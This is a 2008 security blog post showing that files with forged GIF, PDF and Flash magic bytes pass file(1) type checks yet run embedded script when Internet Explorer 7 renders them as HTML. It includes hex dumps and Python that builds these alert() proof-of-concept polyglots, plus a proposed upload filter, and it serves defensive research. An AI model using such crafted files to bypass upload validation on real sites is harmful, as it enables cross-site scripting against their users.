blafra
a place to spew

Content Ownership and Validating File Types

April 8th, 2008 by Blake Frantz

I was referred to Billy (BK) Rios’s blog because an article there relates to research I conducted on how browsers react to different combinations of Content-Type, Content-Disposition, and data. That is where I first came across the term “Content Ownership”: the concept was familiar, but the pretty term was not.

It’s pretty clear that taking ownership of other people’s content is risky business, especially given Internet Explorer’s willingness to render data as HTML regardless of the advertised Content-Type. However, serving up other people’s content is often a requirement, and so is having that content look pretty. Flickr surely can’t send images with a Content-Disposition type of ‘attachment’ without killing its user experience. That leaves us needing additional validation. So how do we do that? File extensions surely don’t work, and neither will anything else that originates from the user and makes claims about the content format. What about file(1) and magic(4)?

For those unfamiliar, magic(4) describes the grammar of the magic database that file(1) uses to determine a file’s type from its content rather than its name. For example:

blake@cecilia ~ $ file /bin/ls
/bin/ls: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), ...
blake@cecilia ~ $ file /etc/passwd
/etc/passwd: ASCII text
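To make the idea concrete, here is a rough Python sketch of what a magic(4)-style check boils down to for the formats tested in this post: compare the first few bytes against known signatures. The signature table and the sniff() helper are hypothetical; the real magic database has far more entries and also inspects fields at other offsets.

```python
# Minimal magic(4)-style sniffer (hypothetical): match fixed byte strings
# at offset 0. Descriptions mirror the file(1) output shown in this post.
SIGNATURES = [
    (b"\xff\xd8\xff", "JPEG image data"),
    (b"\x89PNG\r\n\x1a\n", "PNG image data"),
    (b"GIF8", "GIF image data"),
    (b"FWS", "Macromedia Flash data"),
    (b"CWS", "Macromedia Flash data (compressed)"),
    (b"FLV", "Macromedia Flash Video"),
    (b"PDF", "Macintosh PDF File (data)"),
]


def sniff(data: bytes) -> str:
    """Return the description of the first signature that prefixes data."""
    for magic, description in SIGNATURES:
        if data.startswith(magic):
            return description
    return "data"  # file(1)'s generic label for unrecognized binary content


if __name__ == "__main__":
    print(sniff(b"GIF8<html><script>alert();</script></html>"))
```

Nothing after the signature is examined, so the example input is reported as "GIF image data" even though everything past the fourth byte is HTML.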


At first glance, this seems like a viable option. However, as some simple testing shows, anyone relying on file(1) and magic(4) for content-type validation is in for a surprise.

I was able to construct GIF, PDF, Macromedia Flash (FWS), Macromedia Flash Video (FLV), and Compressed Macromedia Flash (CWS) files that satisfy file(1) yet render as HTML/JavaScript in Internet Explorer 7. It’s worth noting that I also tried creating a simple JPEG and PNG in the same manner, but IE would not render them as HTML. I suspect this is due to the upper ASCII (high-bit) bytes in the headers of these files; more testing on that later. The implication is that anyone relying on file(1) or magic(4) to make content ownership decisions may have a problem.
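The upper ASCII hypothesis is easy to check at least superficially. This sketch takes the header bytes from the test files listed below and reports which of them contain bytes with the high bit set. The HEADERS table and has_high_bytes() are my own illustrative names, and the check says nothing about what IE actually does internally.

```python
# Which format signatures contain bytes in the 0x80-0xFF range?
# Header bytes are copied from the test files in this post.
HEADERS = {
    "GIF": b"GIF8",
    "PDF": b"PDF",
    "FWS": b"FWS",
    "FLV": b"FLV",
    "CWS": b"CWS",
    "JPEG": b"\xff\xd8\xff\xe0\x00\x10JFIF",
    "PNG": b"\x89PNG\r\n\x1a\n",
}


def has_high_bytes(data: bytes) -> bool:
    """True if any byte has the high bit set (0x80-0xFF)."""
    return any(b >= 0x80 for b in data)


if __name__ == "__main__":
    for name, header in HEADERS.items():
        print(f"{name:<5} high-bit bytes: {has_high_bytes(header)}")
```

Only the JPEG and PNG signatures contain high-bit bytes, which fits the hypothesis. Those two headers also contain control bytes such as 0x00 and 0x1A, though, so this alone doesn’t isolate which property stops IE from treating them as HTML.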

Below are the files I used for testing:

JPEG:
0000h: FF D8 FF E0 00 10 4A 46 49 46 3C 68 74 6D 6C 3E  ......JFIF<html>
0010h: 3C 73 63 72 69 70 74 3E 61 6C 65 72 74 28 29 3B  <script>alert();
0020h: 3C 2F 73 63 72 69 70 74 3E 3C 2F 68 74 6D 6C 3E  </script></html>
PDF:
0000h: 50 44 46 3C 68 74 6D 6C 3E 3C 73 63 72 69 70 74  PDF<html><script
0010h: 3E 61 6C 65 72 74 28 29 3B 3C 2F 73 63 72 69 70  >alert();</scrip
0020h: 74 3E 3C 2F 68 74 6D 6C 3E                       t></html>
FWS:
0000h: 46 57 53 3C 68 74 6D 6C 3E 3C 73 63 72 69 70 74  FWS<html><script
0010h: 3E 61 6C 65 72 74 28 29 3B 3C 2F 73 63 72 69 70  >alert();</scrip
0020h: 74 3E 3C 2F 68 74 6D 6C 3E                       t></html>
FLV:
0000h: 46 4C 56 3C 68 74 6D 6C 3E 3C 73 63 72 69 70 74  FLV<html><script
0010h: 3E 61 6C 65 72 74 28 29 3B 3C 2F 73 63 72 69 70  >alert();</scrip
0020h: 74 3E 3C 2F 68 74 6D 6C 3E                       t></html>
CWS:
0000h: 43 57 53 3C 68 74 6D 6C 3E 3C 73 63 72 69 70 74  CWS<html><script
0010h: 3E 61 6C 65 72 74 28 29 3B 3C 2F 73 63 72 69 70  >alert();</scrip
0020h: 74 3E 3C 2F 68 74 6D 6C 3E                       t></html>
PNG:
0000h: 89 50 4E 47 0D 0A 1A 0A 3C 68 74 6D 6C 3E 3C 73  .PNG....<html><s
0010h: 63 72 69 70 74 3E 61 6C 65 72 74 28 29 3B 3C 2F  cript>alert();</
0020h: 73 63 72 69 70 74 3E 3C 2F 68 74 6D 6C 3E        script></html>
GIF: 
0000h: 47 49 46 38 3C 68 74 6D 6C 3E 3C 73 63 72 69 70  GIF8<html><scrip
0010h: 74 3E 61 6C 65 72 74 28 29 3B 3C 2F 73 63 72 69  t>alert();</scri
0020h: 70 74 3E 3C 2F 68 74 6D 6C 3E                    pt></html>
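Each test file is just a format signature followed by the same HTML/JavaScript payload, so they are trivial to regenerate. Here is a sketch that rebuilds them and prints dumps in the layout used above. The file names come from the file(1) listing in this post; build_files() and hexdump() are hypothetical helpers, and running the script writes the files into the current directory.

```python
# Rebuild the crafted test files: signature bytes + a shared HTML payload.
PAYLOAD = b"<html><script>alert();</script></html>"

PREFIXES = {
    "jpeg.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF",
    "pdf.pdf": b"PDF",
    "flash.fla": b"FWS",
    "flashvideo.fla": b"FLV",
    "compressed_flash.cws": b"CWS",
    "png.png": b"\x89PNG\r\n\x1a\n",
    "gif.gif": b"GIF8",
}


def build_files() -> dict:
    """Map each file name to its signature followed by the payload."""
    return {name: prefix + PAYLOAD for name, prefix in PREFIXES.items()}


def hexdump(data: bytes) -> str:
    """Offset, up to 16 hex bytes, then printable ASCII ('.' otherwise)."""
    lines = []
    for offset in range(0, len(data), 16):
        chunk = data[offset:offset + 16]
        hex_part = " ".join(f"{b:02X}" for b in chunk)
        text = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in chunk)
        lines.append(f"{offset:04X}h: {hex_part:<47}  {text}")
    return "\n".join(lines)


if __name__ == "__main__":
    for name, data in build_files().items():
        with open(name, "wb") as fh:  # writes into the current directory
            fh.write(data)
        print(f"{name}:\n{hexdump(data)}")
```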


and the file(1) output for these files:

blake@cecilia ~ $ for i in `ls`; do file $i;done
compressed_flash.cws: Macromedia Flash data (compressed), version 60
flash.fla: Macromedia Flash data, version 60
flashvideo.fla: Macromedia Flash Video
gif.gif: GIF image data 28020 x 15980
jpeg.jpg: JPEG image data, JFIF standard 104.116, thumbnail 99x114
pdf.pdf: Macintosh PDF File (data) : F<html><script>alert();</script
png.png: PNG image data, 1668442480 x 1950245228, 101-bit
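The odd dimensions and version numbers above aren’t random: file(1) is reading header fields that, in these files, happen to be characters of the HTML payload. This sketch decodes the same fields using the standard GIF, PNG, JFIF, and SWF header layouts. The helper names are mine, and I’m assuming file(1)’s magic entries read these offsets, which the matching numbers bear out.

```python
import struct

PAYLOAD = b"<html><script>alert();</script></html>"


def gif_size(data):
    # Logical screen width/height: little-endian uint16 at offsets 6 and 8.
    return struct.unpack_from("<HH", data, 6)


def png_ihdr(data):
    # IHDR width/height: big-endian uint32 at offsets 16 and 20; bit depth at 24.
    width, height = struct.unpack_from(">II", data, 16)
    return width, height, data[24]


def jfif_fields(data):
    # JFIF version bytes at offsets 11-12; thumbnail width/height at 18-19.
    return (data[11], data[12]), (data[18], data[19])


def swf_version(data):
    # SWF version byte follows the three-byte FWS/CWS signature.
    return data[3]


if __name__ == "__main__":
    print("GIF %d x %d" % gif_size(b"GIF8" + PAYLOAD))
    print("PNG %d x %d, %d-bit" % png_ihdr(b"\x89PNG\r\n\x1a\n" + PAYLOAD))
    (major, minor), (tw, th) = jfif_fields(b"\xff\xd8\xff\xe0\x00\x10JFIF" + PAYLOAD)
    print(f"JFIF standard {major}.{minor}, thumbnail {tw}x{th}")
    print("Flash version", swf_version(b"FWS" + PAYLOAD))
```

Running it reproduces the listing: the GIF’s 28020 x 15980 is "tm" and "l>" read as little-endian integers, the PNG’s 101-bit depth is the letter "e", and Flash version 60 is the "<" that opens the payload.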


This brings up a bigger issue: those writing browsers and those writing web platforms need to agree on a standardized method for identifying content types. As the results above show, differences between detection mechanisms are likely to have very real security implications.
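Until such a standard exists, one stopgap is for the platform to approximate the browser’s view as well as its own. The sketch below accepts an upload only if it starts with the expected signature and its leading bytes contain no HTML-looking tags. Everything here is hypothetical: the tag list and the 256-byte window are illustrative assumptions, not any browser’s documented sniffing rules.

```python
import re

# Assumed size of the region a sniffing browser inspects (illustrative).
SNIFF_WINDOW = 256
# Illustrative, non-exhaustive list of tags that might trigger HTML rendering.
HTML_MARKERS = re.compile(
    rb"<\s*(?:html|head|body|script|iframe|title|table|pre|img|a\s)",
    re.IGNORECASE,
)


def looks_like_html(data: bytes) -> bool:
    """True if HTML-looking markup appears within the assumed sniff window."""
    return HTML_MARKERS.search(data[:SNIFF_WINDOW]) is not None


def accept_upload(data: bytes, expected_signature: bytes) -> bool:
    """Require the expected magic bytes AND no markup near the start."""
    return data.startswith(expected_signature) and not looks_like_html(data)


if __name__ == "__main__":
    crafted = b"GIF8<html><script>alert();</script></html>"
    print(accept_upload(crafted, b"GIF8"))  # the crafted GIF is rejected
```

This is a blacklist, so it inherits the usual weaknesses: a legitimate image could contain one of these byte sequences by chance, and a browser with a different window or tag list would still disagree with it.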

Posted in security, web
